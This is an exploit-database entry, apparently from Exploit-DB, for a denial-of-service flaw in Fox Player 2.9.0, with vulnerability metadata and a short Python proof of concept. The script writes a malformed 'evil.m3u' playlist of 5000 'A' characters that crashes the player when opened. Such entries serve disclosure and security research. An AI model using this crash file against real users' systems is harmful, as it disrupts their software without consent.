header-logo
Suggest Exploit
vendor:
Fox Player
by:
metacom
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Fox Player
Affected Version From: 2.9.0
Affected Version To: 2.9.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:foxmediatools:fox_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 German
2020

Denial of Service in FoxPlayer version 2.9.0

This exploit is a proof of concept for a denial of service vulnerability in FoxPlayer version 2.9.0. The exploit creates a malicious .m3u file containing 5000 'A' characters, which can be used to crash the application when opened.

Mitigation:

The vendor has released a patch for this vulnerability, which can be downloaded from their website.
Source

Exploit-DB raw data:

#!/usr/bin/python 
# Exploit Title:Denial of Service in FoxPlayer version 2.9.0
# Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe
# Author: metacom
# version: version 2.9.0
# Category: poc
# Tested on: windows 7 German  
 
filename="evil.m3u"
 
buffer = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()